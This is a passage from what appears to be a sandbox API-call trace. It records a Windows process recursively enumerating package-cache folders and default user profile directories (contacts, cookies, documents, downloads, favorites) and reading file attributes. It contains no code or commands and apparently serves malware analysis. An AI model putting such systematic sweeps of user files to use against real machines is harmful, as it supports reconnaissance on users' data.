lpFileName="c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c720 [0038.843] FindNextFileW (in: hFindFile=0x37c720, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.843] FindNextFileW (in: hFindFile=0x37c720, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.843] FindNextFileW (in: hFindFile=0x37c720, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.843] FindNextFileW (in: hFindFile=0x37c720, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.843] FindClose (in: hFindFile=0x37c720 | out: hFindFile=0x37c720) returned 1 [0038.843] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.843] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c740 [0038.844] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.844] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.844] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37e160 [0038.845] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.845] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.845] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e298 [0038.846] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.846] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.846] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd6d4 | out: lpFileInformation=0x1cd6d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66936b00, ftCreationTime.dwHighDateTime=0x1d28889, ftLastAccessTime.dwLowDateTime=0x66936b00, ftLastAccessTime.dwHighDateTime=0x1d28889, ftLastWriteTime.dwLowDateTime=0x66936b00, ftLastWriteTime.dwHighDateTime=0x1d28889, nFileSizeHigh=0x0, nFileSizeLow=0x13babb)) returned 1 [0038.846] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.847] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0 [0038.847] FindClose (in: hFindFile=0x37e298 | out: hFindFile=0x37e298) returned 1 [0038.847] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0 [0038.847] FindClose (in: hFindFile=0x37e160 | out: hFindFile=0x37e160) returned 1 [0038.847] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.847] FindClose (in: hFindFile=0x37c740 | out: hFindFile=0x37c740) returned 1 [0038.847] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.847] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c740 [0038.847] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.847] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.848] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37e160 [0038.848] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.848] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.848] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e298 [0038.849] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.849] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.849] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd6d4 | out: lpFileInformation=0x1cd6d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f5c500, ftCreationTime.dwHighDateTime=0x1d28889, ftLastAccessTime.dwLowDateTime=0x68f5c500, ftLastAccessTime.dwHighDateTime=0x1d28889, ftLastWriteTime.dwLowDateTime=0x68f5c500, ftLastWriteTime.dwHighDateTime=0x1d28889, nFileSizeHigh=0x0, nFileSizeLow=0x4f699e)) returned 1 [0038.850] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.850] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0 [0038.850] FindClose (in: hFindFile=0x37e298 | out: hFindFile=0x37e298) returned 1 [0038.850] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0 [0038.850] FindClose (in: hFindFile=0x37e160 | out: hFindFile=0x37e160) returned 1 [0038.850] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.850] FindClose (in: hFindFile=0x37c740 | out: hFindFile=0x37c740) returned 1 [0038.850] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.850] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c740 [0038.851] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.851] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 1 [0038.851] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37e160 [0038.851] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.851] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 1 [0038.851] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e298 [0038.851] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.851] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.851] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd6d4 | out: lpFileInformation=0x1cd6d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe34600, ftCreationTime.dwHighDateTime=0x1ced53e, ftLastAccessTime.dwLowDateTime=0x1fe34600, ftLastAccessTime.dwHighDateTime=0x1ced53e, ftLastWriteTime.dwLowDateTime=0x1fe34600, ftLastWriteTime.dwHighDateTime=0x1ced53e, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418)) returned 1 [0038.852] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 1 [0038.852] FindNextFileW (in: hFindFile=0x37e298, lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0 [0038.852] FindClose (in: hFindFile=0x37e298 | out: hFindFile=0x37e298) returned 1 [0038.852] FindNextFileW (in: hFindFile=0x37e160, lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0 [0038.852] FindClose (in: hFindFile=0x37e160 | out: hFindFile=0x37e160) returned 1 [0038.852] FindNextFileW (in: hFindFile=0x37c740, lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0 [0038.852] FindClose (in: hFindFile=0x37c740 | out: hFindFile=0x37c740) returned 1 [0038.852] FindNextFileW (in: hFindFile=0x37c688, lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 1 [0038.852] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c740 [0038.853] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37e160 [0038.853] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e298 [0038.854] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd6d4 | out: lpFileInformation=0x1cd6d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d80ec00, ftCreationTime.dwHighDateTime=0x1ced53e, ftLastAccessTime.dwLowDateTime=0x1d80ec00, ftLastAccessTime.dwHighDateTime=0x1ced53e, ftLastWriteTime.dwLowDateTime=0x1d80ec00, ftLastWriteTime.dwHighDateTime=0x1ced53e, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1)) returned 1 [0038.854] FindClose (in: hFindFile=0x37e298 | out: hFindFile=0x37e298) returned 1 [0038.855] FindClose (in: hFindFile=0x37e160 | out: hFindFile=0x37e160) returned 1 [0038.855] FindClose (in: hFindFile=0x37c740 | out: hFindFile=0x37c740) returned 1 [0038.855] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c720 [0038.855] FindClose (in: hFindFile=0x37c720 | out: hFindFile=0x37c720) returned 1 [0038.856] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c720 [0038.856] FindClose (in: hFindFile=0x37c720 | out: hFindFile=0x37c720) returned 1 [0038.856] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c740 [0038.857] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37e160 [0038.857] FindFirstFileW (in: lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e298 [0038.857] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), fInfoLevelId=0x0, lpFileInformation=0x1cd6d4 | out: lpFileInformation=0x1cd6d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8639f00, ftCreationTime.dwHighDateTime=0x1cf3e37, ftLastAccessTime.dwLowDateTime=0xe8639f00, ftLastAccessTime.dwHighDateTime=0x1cf3e37, ftLastWriteTime.dwLowDateTime=0xe8639f00, ftLastWriteTime.dwHighDateTime=0x1cf3e37, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520)) returned 1 [0038.858] FindClose (in: hFindFile=0x37e298 | out: hFindFile=0x37e298) returned 1 [0038.858] FindClose (in: hFindFile=0x37e160 | out: hFindFile=0x37e160) returned 1 [0038.858] FindClose (in: hFindFile=0x37c740 | out: hFindFile=0x37c740) returned 1 [0038.858] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.858] FindFirstFileW (in: lpFileName="c:\\users\\all users\\start menu\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0038.858] FindFirstFileW (in: lpFileName="c:\\users\\all users\\sun\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37ad90 [0038.858] FindFirstFileW (in: lpFileName="c:\\users\\all users\\sun\\java\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c688 [0038.923] FindFirstFileW (in: lpFileName="c:\\users\\all users\\sun\\java\\java update\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37c6c8 [0038.924] GetFileAttributesExW (in: lpFileName="c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), fInfoLevelId=0x0, lpFileInformation=0x1cdc34 | out: lpFileInformation=0x1cdc34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70634730, ftCreationTime.dwHighDateTime=0x1d2da24, ftLastAccessTime.dwLowDateTime=0x70634730, ftLastAccessTime.dwHighDateTime=0x1d2da24, ftLastWriteTime.dwLowDateTime=0x70634730, ftLastWriteTime.dwHighDateTime=0x1d2da24, nFileSizeHigh=0x0, nFileSizeLow=0x77)) returned 1 [0038.924] FindClose (in: hFindFile=0x37c6c8 | out: hFindFile=0x37c6c8) returned 1 [0038.924] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.924] FindClose (in: hFindFile=0x37ad90 | out: hFindFile=0x37ad90) returned 1 [0038.924] FindFirstFileW (in: lpFileName="c:\\users\\all users\\templates\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0038.924] FindClose (in: hFindFile=0x37be48 | out: hFindFile=0x37be48) returned 1 [0038.924] FindFirstFileW (in: lpFileName="c:\\users\\default\\\\*", lpFindFileData=0x1cea00 | out: lpFindFileData=0x1cea00) returned 0x37be48 [0038.925] FindFirstFileW (in: lpFileName="c:\\users\\default\\appdata\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0038.925] FindFirstFileW (in: lpFileName="c:\\users\\default\\appdata\\roaming\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37ad90 [0038.926] FindFirstFileW (in: lpFileName="c:\\users\\default\\appdata\\roaming\\identities\\\\*", lpFindFileData=0x1cd9e0 | out: lpFindFileData=0x1cd9e0) returned 0x37c730 [0038.926] FindFirstFileW (in: lpFileName="c:\\users\\default\\appdata\\roaming\\identities\\{74a13782-b361-4204-9daa-0a3d49da4337}\\\\*", lpFindFileData=0x1cd480 | out: lpFindFileData=0x1cd480) returned 0x37e110 [0038.926] FindClose (in: hFindFile=0x37e110 | out: hFindFile=0x37e110) returned 1 [0038.926] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0038.926] FindClose (in: hFindFile=0x37ad90 | out: hFindFile=0x37ad90) returned 1 [0038.926] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.927] FindFirstFileW (in: lpFileName="c:\\users\\default\\application data\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0038.927] FindFirstFileW (in: lpFileName="c:\\users\\default\\contacts\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0038.927] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x1ff8a75a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0038.928] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c82b40, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x19c)) returned 1 [0038.928] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.928] FindFirstFileW (in: lpFileName="c:\\users\\default\\cookies\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0xffffffff [0038.928] FindFirstFileW (in: lpFileName="c:\\users\\default\\desktop\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0038.929] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c82b40, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0038.929] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.929] FindFirstFileW (in: lpFileName="c:\\users\\default\\documents\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0038.930] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27f56565, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0038.931] FindFirstFileW (in: lpFileName="c:\\users\\default\\documents\\my music\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0038.931] FindFirstFileW (in: lpFileName="c:\\users\\default\\documents\\my pictures\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0038.931] FindFirstFileW (in: lpFileName="c:\\users\\default\\documents\\my videos\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0xffffffff [0038.931] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.932] FindFirstFileW (in: lpFileName="c:\\users\\default\\downloads\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0038.932] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ee4144, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0038.932] FindClose (in: hFindFile=0x37c688 | out: hFindFile=0x37c688) returned 1 [0038.933] FindFirstFileW (in: lpFileName="c:\\users\\default\\favorites\\\\*", lpFindFileData=0x1ce4a0 | out: lpFindFileData=0x1ce4a0) returned 0x37c688 [0038.948] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce6f4 | out: lpFileInformation=0x1ce6f4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27ccee00, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0038.949] FindFirstFileW (in: lpFileName="c:\\users\\default\\favorites\\links\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c730 [0038.949] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29913374, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x50)) returned 1 [0038.950] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c8e990, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c8e990, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x299f7bb6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xe2)) returned 1 [0038.950] FindClose (in: hFindFile=0x37c730 | out: hFindFile=0x37c730) returned 1 [0038.950] FindFirstFileW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\\\*", lpFindFileData=0x1cdf40 | out: lpFindFileData=0x1cdf40) returned 0x37c730 [0038.985] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0038.986] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0038.986] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x29130a86, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0038.987] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), fInfoLevelId=0x0, lpFileInformation=0x1ce194 | out: lpFileInformation=0x1ce194*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68830, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c68830, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x2910a926, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x85)) returned 1 [0038.987] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\favorites\\msn websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), 